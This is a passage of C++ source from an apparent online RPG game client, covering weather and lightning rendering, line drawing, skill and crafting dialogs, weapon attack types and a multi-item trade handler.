		for (i = 0; i < sCnt; i++)
		{
			m_stWhetherObject[i].cStep++;
			if ((m_stWhetherObject[i].cStep >= 0) && (m_stWhetherObject[i].cStep < 80))
			{
				cAdd = (80 - m_stWhetherObject[i].cStep) / 10;
				if (cAdd < 0) cAdd = 0;
				m_stWhetherObject[i].sY = m_stWhetherObject[i].sY + cAdd;

				//Snoopy: Snow on lower bar
				if (m_stWhetherObject[i].sY > (600 + m_sViewPointY))
				{
					m_stWhetherObject[i].sY = 600 + m_sViewPointY;
					if ((rand() % 10) != 2) m_stWhetherObject[i].cStep--;
					if (m_stWhetherObject[i].sBX == 0) m_stWhetherObject[i].sBX = m_stWhetherObject[i].sX - m_sViewPointX;


				}
				else m_stWhetherObject[i].sX += 1 - (rand() % 3);
			}
			else if (m_stWhetherObject[i].cStep >= 80)
			{
				if (m_bIsWhetherEffect == FALSE)
				{
					m_stWhetherObject[i].sX = 0;
					m_stWhetherObject[i].sY = 0;
					m_stWhetherObject[i].sBX = 0;
					m_stWhetherObject[i].cStep = 80;
				}
				else
				{
					m_stWhetherObject[i].sX = (m_pMapData->m_sPivotX * 32) + ((rand() % 940) - 200) + 300;
					m_stWhetherObject[i].sY = (m_pMapData->m_sPivotY * 32) + ((rand() % 800) - 600) + 600;
					m_stWhetherObject[i].cStep = -1 * (rand() % 10);
					m_stWhetherObject[i].sBX = 0;
				}
			}
		}
		break;
	}
}

void CGame::SetWhetherStatus(BOOL bStart, char cType)
{SYSTEMTIME SysTime;
	GetLocalTime(&SysTime);
	if (bStart == TRUE)
	{	m_bIsWhetherEffect   = TRUE;
		m_cWhetherEffectType = cType;
		if ((m_bSoundStat == TRUE) && (m_bSoundFlag) && (cType >= 1) && (cType <= 3)) m_pESound[38]->Play(TRUE);

		for (int i = 0; i < DEF_MAXWHETHEROBJECTS; i++)
		{	m_stWhetherObject[i].sX    = 1;
			m_stWhetherObject[i].sBX    = 1;
			m_stWhetherObject[i].sY    = 1;
			m_stWhetherObject[i].cStep = -1*(rand() % 40);
		}
		if( cType >= 4 && cType <= 6 )
		{	if( m_bMusicStat ) StartBGM();
		}
	}else
	{	m_bIsWhetherEffect = FALSE;
		m_cWhetherEffectType = NULL;
		if ((m_bSoundStat == TRUE) && (m_bSoundFlag)) m_pESound[38]->bStop();
	}
}

void CGame::DlgBoxClick_ShutDownMsg(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[25].sX;
	sY = m_stDialogBoxInfo[25].sY;
	if ((msX >= sX + 210) && (msX <= sX + 210 + DEF_BTNSZX) && (msY > sY + 127) && (msY < sY + 127 + DEF_BTNSZY)) {
		DisableDialogBox(25);
		PlaySound('E', 14, 5);
	}
}

void CGame::DrawLine(int x0, int y0, int x1, int y1, int iR, int iG, int iB)
{
 int dx, dy, x_inc, y_inc, error, index, dstR, dstG, dstB;
 int iResultX, iResultY;
 WORD * pDst;

	if ((x0 == x1) && (y0 == y1)) return;
	error = 0;
	iResultX = x0;
	iResultY = y0;
	dx = x1-x0;
	dy = y1-y0;
	if(dx>=0)
	{	x_inc = 1;
	}else
	{	x_inc = -1;
		dx = -dx;
	}
	if(dy>=0)
	{	y_inc = 1;
	}else
	{	y_inc = -1;
		dy = -dy;
	}
	if(dx>dy)
	{	for(index = 0; index <= dx; index++)
		{	error += dy;
			if(error > dx)
			{	error -= dx;
				iResultY += y_inc;
			}
			iResultX += x_inc;
#ifdef RES_HIGH
			if ((iResultX >= 0) && (iResultX < 800) && (iResultY >= 0) && (iResultY < 600)) {
#else
			if ((iResultX >= 0) && (iResultX < 640) && (iResultY >= 0) && (iResultY < 480)) {
#endif
				pDst = (WORD *)m_DDraw.m_pBackB4Addr + iResultX + ((iResultY)*m_DDraw.m_sBackB4Pitch);
				switch (m_DDraw.m_cPixelFormat) {
				case 1:
					dstR = (int)m_DDraw.m_lTransRB100[(pDst[0]&0xF800)>>11][iR];
					dstG = (int)m_DDraw.m_lTransG100[(pDst[0]&0x7E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB100[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<11) | (dstG<<5) | dstB);
					break;

				case 2:
					dstR = (int)m_DDraw.m_lTransRB100[(pDst[0]&0x7C00)>>10][iR];
					dstG = (int)m_DDraw.m_lTransG100[(pDst[0]&0x3E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB100[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<10) | (dstG<<5) | dstB);
					break;
		}	}	}
	}else
	{	for(index = 0; index <= dy; index++)
		{	error += dx;
			if(error > dy)
			{	error -= dy;
				iResultX += x_inc;
			}
			iResultY += y_inc;
#ifdef RES_HIGH
			if ((iResultX >= 0) && (iResultX < 800) && (iResultY >= 0) && (iResultY < 600)) {
#else
			if ((iResultX >= 0) && (iResultX < 640) && (iResultY >= 0) && (iResultY < 480)) {
#endif
				pDst = (WORD *)m_DDraw.m_pBackB4Addr + iResultX + ((iResultY)*m_DDraw.m_sBackB4Pitch);
				switch (m_DDraw.m_cPixelFormat) {
				case 1:
					dstR = (int)m_DDraw.m_lTransRB100[(pDst[0]&0xF800)>>11][iR];
					dstG = (int)m_DDraw.m_lTransG100[(pDst[0]&0x7E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB100[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<11) | (dstG<<5) | dstB);
					break;

				case 2:
					dstR = (int)m_DDraw.m_lTransRB100[(pDst[0]&0x7C00)>>10][iR];
					dstG = (int)m_DDraw.m_lTransG100[(pDst[0]&0x3E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB100[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<10) | (dstG<<5) | dstB);
					break;
	}	}	}	}
}


void CGame::DrawLine2(int x0, int y0, int x1, int y1, int iR, int iG, int iB)
{int dx, dy, x_inc, y_inc, error, index, dstR, dstG, dstB;
 int iResultX, iResultY;
 WORD * pDst;
	if ((x0 == x1) && (y0 == y1)) return;

	error = 0;
	iResultX = x0;
	iResultY = y0;
	dx = x1-x0;
	dy = y1-y0;
	if(dx>=0)
	{	x_inc = 1;
	}else
	{	x_inc = -1;
		dx = -dx;
	}
	if(dy>=0)
	{	y_inc = 1;
	}else
	{	y_inc = -1;
		dy = -dy;
	}
	if(dx>dy)
	{	for(index = 0; index <= dx; index++)
		{	error += dy;
			if(error > dx)
			{	error -= dx;
				iResultY += y_inc;
			}
			iResultX += x_inc;
#ifdef RES_HIGH
			if ((iResultX >= 0) && (iResultX < 800) && (iResultY >= 0) && (iResultY < 600)) {
#else
			if ((iResultX >= 0) && (iResultX < 640) && (iResultY >= 0) && (iResultY < 480)) {
#endif
				pDst = (WORD *)m_DDraw.m_pBackB4Addr + iResultX + ((iResultY)*m_DDraw.m_sBackB4Pitch);
				switch (m_DDraw.m_cPixelFormat) {
				case 1:
					dstR = (int)m_DDraw.m_lTransRB50[(pDst[0]&0xF800)>>11][iR];
					dstG = (int)m_DDraw.m_lTransG50[(pDst[0]&0x7E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB50[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<11) | (dstG<<5) | dstB);
					break;

				case 2:
					dstR = (int)m_DDraw.m_lTransRB50[(pDst[0]&0x7C00)>>10][iR];
					dstG = (int)m_DDraw.m_lTransG50[(pDst[0]&0x3E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB50[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<10) | (dstG<<5) | dstB);
					break;
		}	}	}
	}else
	{	for(index = 0; index <= dy; index++)
		{	error += dx;
			if(error > dy)
			{	error -= dy;
				iResultX += x_inc;
			}
			iResultY += y_inc;
#ifdef RES_HIGH
			if ((iResultX >= 0) && (iResultX < 800) && (iResultY >= 0) && (iResultY < 600)) {
#else
			if ((iResultX >= 0) && (iResultX < 640) && (iResultY >= 0) && (iResultY < 480)) {
#endif
				pDst = (WORD *)m_DDraw.m_pBackB4Addr + iResultX + ((iResultY)*m_DDraw.m_sBackB4Pitch);
				switch (m_DDraw.m_cPixelFormat) {
				case 1:
					dstR = (int)m_DDraw.m_lTransRB50[(pDst[0]&0xF800)>>11][iR];
					dstG = (int)m_DDraw.m_lTransG50[(pDst[0]&0x7E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB50[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<11) | (dstG<<5) | dstB);
					break;

				case 2:
					dstR = (int)m_DDraw.m_lTransRB50[(pDst[0]&0x7C00)>>10][iR];
					dstG = (int)m_DDraw.m_lTransG50[(pDst[0]&0x3E0)>>5][iG];
					dstB = (int)m_DDraw.m_lTransRB50[(pDst[0]&0x1F)][iB];
					*pDst = (WORD)((dstR<<10) | (dstG<<5) | dstB);
					break;
	}	}	}	}
}

void CGame::_DrawThunderEffect(int sX, int sY, int dX, int dY, int rX, int rY, char cType)
{int j, iErr, pX1, pY1, iX1, iY1, tX, tY;
 char cDir;
 DWORD dwTime;
 WORD  wR1, wG1, wB1, wR2, wG2, wB2, wR3, wG3, wB3, wR4, wG4, wB4;
	dwTime = m_dwCurTime;
	sX = pX1 = iX1 = tX = sX;
	sY = pY1 = iY1 = tY = sY;
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(50, 50, 100), &wR1, &wG1, &wB1);
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(30, 30, 100), &wR2, &wG2, &wB2);
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0, 0, 30), &wR3, &wG3, &wB3);
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(50, 50, 200), &wR4, &wG4, &wB4);

	for (j = 0; j < 100; j++)
	{	switch (cType) {
		case 1:
			DrawLine(pX1, pY1, iX1, iY1, 15, 15, 20);
			DrawLine(pX1-1, pY1, iX1-1, iY1, wR1, wG1, wB1);
			DrawLine(pX1+1, pY1, iX1+1, iY1, wR1, wG1, wB1);
			DrawLine(pX1, pY1-1, iX1, iY1-1, wR1, wG1, wB1);
			DrawLine(pX1, pY1+1, iX1, iY1+1, wR1, wG1, wB1);

			DrawLine(pX1-2, pY1, iX1-2, iY1, wR2, wG2, wB2);
			DrawLine(pX1+2, pY1, iX1+2, iY1, wR2, wG2, wB2);
			DrawLine(pX1, pY1-2, iX1, iY1-2, wR2, wG2, wB2);
			DrawLine(pX1, pY1+2, iX1, iY1+2, wR2, wG2, wB2);

			DrawLine(pX1-1, pY1-1, iX1-1, iY1-1, wR3, wG3, wB3);
			DrawLine(pX1+1, pY1-1, iX1+1, iY1-1, wR3, wG3, wB3);
			DrawLine(pX1+1, pY1-1, iX1+1, iY1-1, wR3, wG3, wB3);
			DrawLine(pX1-1, pY1+1, iX1-1, iY1+1, wR3, wG3, wB3);
			break;

		case 2:
			DrawLine2(pX1, pY1, iX1, iY1, wR4, wG4, wB4);
			break;
		}
		iErr = 0;
		m_Misc.GetPoint(sX, sY, dX, dY, &tX, &tY, &iErr, j*10);
		pX1 = iX1;
		pY1 = iY1;
		cDir = m_Misc.cGetNextMoveDir(iX1, iY1, tX, tY);
		switch (cDir) {
		case 1:	rY -= 5; break;
		case 2: rY -= 5; rX += 5; break;
		case 3:	rX += 5; break;
		case 4: rX += 5; rY += 5; break;
		case 5: rY += 5; break;
		case 6: rX -= 5; rY += 5; break;
		case 7: rX -= 5; break;
		case 8: rX -= 5; rY -= 5; break;
		}
		if (rX < -20) rX = -20;
		if (rX >  20) rX =  20;
		if (rY < -20) rY = -20;
		if (rY >  20) rY =  20;
		iX1 = iX1 + rX;
		iY1 = iY1 + rY;
		if ((abs(tX - dX) < 5) && (abs(tY - dY) < 5)) break;
	}
	switch (cType) {
	case 1:
		m_pEffectSpr[6]->PutTransSprite(iX1, iY1, (rand() % 2), dwTime);
		break;
	}
}

BOOL CGame::bDlgBoxPress_SkillDlg(short msX, short msY)
{int i , iAdjX, iAdjY ;
 char  cItemID;
 short sX, sY, x1, y1, x2, y2, sArray[10];
	sX = m_stDialogBoxInfo[26].sX;
	sY = m_stDialogBoxInfo[26].sY;
	iAdjX = 5 ;
	iAdjY = 10 ;
	switch (m_stDialogBoxInfo[26].cMode) {
	case 1:
		ZeroMemory(sArray, sizeof(sArray));
		sArray[1] = m_stDialogBoxInfo[26].sV1;
		sArray[2] = m_stDialogBoxInfo[26].sV2;
		sArray[3] = m_stDialogBoxInfo[26].sV3;
		sArray[4] = m_stDialogBoxInfo[26].sV4;
		sArray[5] = m_stDialogBoxInfo[26].sV5;
		sArray[6] = m_stDialogBoxInfo[26].sV6;
		for (i = 1; i <= 6; i++)
		if ((sArray[i] != -1) && (m_pItemList[sArray[i]] != NULL))
		{	cItemID = (char)sArray[i];
			switch (i) {
			case 1: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55, sY + iAdjY + 55,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 2: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*1, sY + iAdjY + 55,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 3: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*2, sY + iAdjY + 55, m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 4: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55, sY + iAdjY + 100,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 5: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*1, sY + iAdjY + 100,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 6: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*2, sY + iAdjY + 100, m_pItemList[cItemID]->m_sSpriteFrame); break;
			}
			x1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.left;
			y1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.top;
			x2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.right;
			y2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.bottom;
			if ((msX > x1) && (msX < x2) && (msY > y1) && (msY < y2))
			{	switch (i) {
				case 1: m_stDialogBoxInfo[26].sV1 = -1; break;
				case 2: m_stDialogBoxInfo[26].sV2 = -1; break;
				case 3: m_stDialogBoxInfo[26].sV3 = -1; break;
				case 4: m_stDialogBoxInfo[26].sV4 = -1; break;
				case 5: m_stDialogBoxInfo[26].sV5 = -1; break;
				case 6: m_stDialogBoxInfo[26].sV6 = -1; break;
				}
				m_bIsItemDisabled[cItemID] = FALSE;
				m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = cItemID;
				m_stMCursor.sDistX = msX + iAdjX - x1 + (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_sPivotX;
				m_stMCursor.sDistY = msY + iAdjY - y1 + (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_sPivotY;
				return TRUE;
		}	}
		break;

	case 4:
		ZeroMemory(sArray, sizeof(sArray));
		sArray[1] = m_stDialogBoxInfo[26].sV1;
		sArray[2] = m_stDialogBoxInfo[26].sV2;
		sArray[3] = m_stDialogBoxInfo[26].sV3;
		sArray[4] = m_stDialogBoxInfo[26].sV4;
		sArray[5] = m_stDialogBoxInfo[26].sV5;
		sArray[6] = m_stDialogBoxInfo[26].sV6;
		for (i = 1; i <= 6; i++)
		if ((sArray[i] != -1) && (m_pItemList[sArray[i]] != NULL))
		{	cItemID = (char)sArray[i];
			switch (i) {
			case 1: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55 +30 +13, sY + iAdjY + 55 +180,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 2: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*1 +30 +13, sY + iAdjY + 55 +180,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 3: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*2 +30 +13, sY + iAdjY + 55 +180, m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 4: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55 +30 +13, sY + iAdjY + 100 +180,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 5: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*1 +30 +13, sY + iAdjY + 100 +180,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 6: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55+45*2 +30 +13, sY + iAdjY + 100 +180, m_pItemList[cItemID]->m_sSpriteFrame); break;
			}
			x1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.left;
			y1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.top;
			x2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.right;
			y2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.bottom;

			if ((msX > x1) && (msX < x2) && (msY > y1) && (msY < y2))
			{	switch (i) {
				case 1: m_stDialogBoxInfo[26].sV1 = -1; break;
				case 2: m_stDialogBoxInfo[26].sV2 = -1; break;
				case 3: m_stDialogBoxInfo[26].sV3 = -1; break;
				case 4: m_stDialogBoxInfo[26].sV4 = -1; break;
				case 5: m_stDialogBoxInfo[26].sV5 = -1; break;
				case 6: m_stDialogBoxInfo[26].sV6 = -1; break;
				}
				m_bIsItemDisabled[cItemID] = FALSE;
				m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = cItemID;
				m_stMCursor.sDistX = msX + iAdjX - x1 + (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_sPivotX;
				m_stMCursor.sDistY = msY + iAdjY - y1 + (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_sPivotY;
				m_stDialogBoxInfo[26].cStr[4] = (char)_bCheckCurrentBuildItemStatus();
				return TRUE;
		}	}
		break;
	// Crafting
	case 7:
		ZeroMemory(sArray, sizeof(sArray));
		sArray[1] = m_stDialogBoxInfo[26].sV1;
		sArray[2] = m_stDialogBoxInfo[26].sV2;
		sArray[3] = m_stDialogBoxInfo[26].sV3;
		sArray[4] = m_stDialogBoxInfo[26].sV4;
		sArray[5] = m_stDialogBoxInfo[26].sV5;
		sArray[6] = m_stDialogBoxInfo[26].sV6;
		for (i = 1; i <= 6; i++)
		if ((sArray[i] != -1) && (m_pItemList[sArray[i]] != NULL))
		{	cItemID = (char)sArray[i];
			switch (i) {
			case 1: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 55, sY + iAdjY + 55,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 2: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 65+45*1, sY + iAdjY + 40,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 3: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 65+45*2, sY + iAdjY + 55, m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 4: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 65, sY + iAdjY + 100,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 5: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 65+45*1, sY + iAdjY + 115,  m_pItemList[cItemID]->m_sSpriteFrame); break;
			case 6: m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + iAdjX + 75+45*2, sY + iAdjY + 100, m_pItemList[cItemID]->m_sSpriteFrame); break;
			}
			x1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.left;
			y1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.top;
			x2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.right;
			y2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.bottom;
			if ((msX > x1) && (msX < x2) && (msY > y1) && (msY < y2))
			{	switch (i) {
				case 1: m_stDialogBoxInfo[26].sV1 = -1; break;
				case 2: m_stDialogBoxInfo[26].sV2 = -1; break;
				case 3: m_stDialogBoxInfo[26].sV3 = -1; break;
				case 4: m_stDialogBoxInfo[26].sV4 = -1; break;
				case 5: m_stDialogBoxInfo[26].sV5 = -1; break;
				case 6: m_stDialogBoxInfo[26].sV6 = -1; break;
				}
				m_bIsItemDisabled[cItemID] = FALSE;
				m_stMCursor.cSelectedObjectType	= DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID   = cItemID;
				m_stMCursor.sDistX = msX + iAdjX - x1 + (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_sPivotX;
				m_stMCursor.sDistY = msY + iAdjY - y1 + (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_sPivotY;
				return TRUE;
		}	}
		break;
	}

	return FALSE;
}
// Snoopy: added StormBlade
int CGame::_iGetAttackType()
{WORD wWeaponType;
	wWeaponType = ((m_sPlayerAppr2 & 0x0FF0) >> 4);
	if (wWeaponType == 0)
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[5] >= 100)) return 20;
		else return 1;		// Boxe
	}else if ((wWeaponType >= 1) && (wWeaponType <= 2))
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[7] >= 100)) return 21;
		else return 1;		//Dag, SS
	}else if ((wWeaponType > 2) && (wWeaponType < 20))
	{	if ((wWeaponType == 7)||(wWeaponType == 18)) // Added Kloness Esterk
		{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[9] >= 100)) return 22;
			else return 1;  // Esterk
		}else if (wWeaponType == 15)
		{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[8] >= 100)) return 30;
			else return 5;  // StormBlade
		}else
		{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[8] >= 100)) return 23;
			else return 1;	// LongSwords
		}
	}else if ((wWeaponType >= 20) && (wWeaponType < 29))
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[10] >= 100)) return 24;
		else return 1;		// Haches
	}else if ((wWeaponType >= 30) && (wWeaponType < 33))
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[14] >= 100)) return 26;
		else return 1;		// Hammers
	}else if ((wWeaponType >= 34) && (wWeaponType < 40))
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[21] >= 100)) return 27;
		else return 1;		// Wands
	}else if (wWeaponType >= 40)
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[6] >= 100)) return 25;
		else return 2;		// Bows
	}else if ((wWeaponType == 29) || (wWeaponType == 33))
	{	if ((m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE) && (m_cSkillMastery[8] >= 100)) return 23;
		else return 1;		// LS
	}
	return 0;
}

int CGame::_iGetWeaponSkillType()
{WORD wWeaponType;
	wWeaponType = ((m_sPlayerAppr2 & 0x0FF0) >> 4);
	if (wWeaponType == 0)
	{	return 5; // Openhand
	}else if ((wWeaponType >= 1) && (wWeaponType < 3))
	{	return 7; // SS
	}else if ((wWeaponType >= 3) && (wWeaponType < 20))
	{	if ((wWeaponType == 7)||(wWeaponType == 18)) // Esterk or KlonessEsterk
			 return 9; // Fencing
		else return 8; // LS
	}else if ((wWeaponType >= 20) && (wWeaponType < 29))
	{	return 10; // Axe (20..28)
	}else if ((wWeaponType >= 30) && (wWeaponType < 33))
	{	return 14; // Hammer (30,31,32)
	}else if ((wWeaponType >= 34) && (wWeaponType < 40))
	{	return 21; // Wand
	}else if (wWeaponType >= 40)
	{	return 6;  // Bow
	}else if ((wWeaponType == 29) || (wWeaponType == 33))
	{	return 8;  // LS LightingBlade || BlackShadow
	}
	return 1; // Fishing !
}

void CGame::NotifyMsg_AdminInfo(char *pData)
{
 char * cp, cStr[256];
 int  * ip, iV1, iV2, iV3, iV4, iV5;

	cp = (char *)(pData + 6);

	ip = (int *)cp;
	iV1 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV2 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV3 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV4 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV5 = *ip;
	cp += 4;

	ZeroMemory(cStr, sizeof(cStr));
	wsprintf(cStr, "%d %d %d %d %d", iV1, iV2, iV3, iV4, iV5);
	AddEventList(cStr);
}


/*********************************************************************************************************************
**  void CGame::bItemDrop_ExchangeDialog(short msX, short msY)	(snoopy)											**
**  description			:: modifyed for MultiTrade																	**
**********************************************************************************************************************/
void CGame::bItemDrop_ExchangeDialog(short msX, short msY)
{
#ifdef MULTI_TRADE
	char cItemID;
	if (m_cCommand < 0) return;
	
	if (m_stDialogBoxExchangeInfo[7].sV1 != -1) return; //Do not  accept item's drop if already 4 items.//50Cent -  MultiTrade
	cItemID = (char)m_stMCursor.sSelectedObjectID;
	if (((m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_CONSUME) || (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_ARROW)) &&
		(m_pItemList[cItemID]->m_dwCount > 1))
	{
		m_stDialogBoxInfo[17].sX = msX - 140;
		m_stDialogBoxInfo[17].sY = msY - 70;
		if (m_stDialogBoxInfo[17].sY < 0) m_stDialogBoxInfo[17].sY = 0;
		m_stDialogBoxInfo[17].sV1 = m_sPlayerX + 1;
		m_stDialogBoxInfo[17].sV2 = m_sPlayerY + 1;
		m_stDialogBoxInfo[17].sV3 = 1000;
		m_stDialogBoxInfo[17].sV4 = cItemID;
		if (m_stDialogBoxExchangeInfo[0].sV1 == -1)			m_stDialogBoxExchangeInfo[0].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[1].sV1 == -1)	m_stDialogBoxExchangeInfo[1].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[2].sV1 == -1)	m_stDialogBoxExchangeInfo[2].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[3].sV1 == -1)	m_stDialogBoxExchangeInfo[3].sItemID = cItemID;
		//50Cent - MultiTrade
		else if (m_stDialogBoxExchangeInfo[4].sV1 == -1)    m_stDialogBoxExchangeInfo[4].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[5].sV1 == -1)    m_stDialogBoxExchangeInfo[5].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[6].sV1 == -1)    m_stDialogBoxExchangeInfo[6].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[7].sV1 == -1)    m_stDialogBoxExchangeInfo[7].sItemID = cItemID;
		else return; // Impossible case, tested at function beginning
		ZeroMemory(m_stDialogBoxInfo[17].cStr, sizeof(m_stDialogBoxInfo[17].cStr));
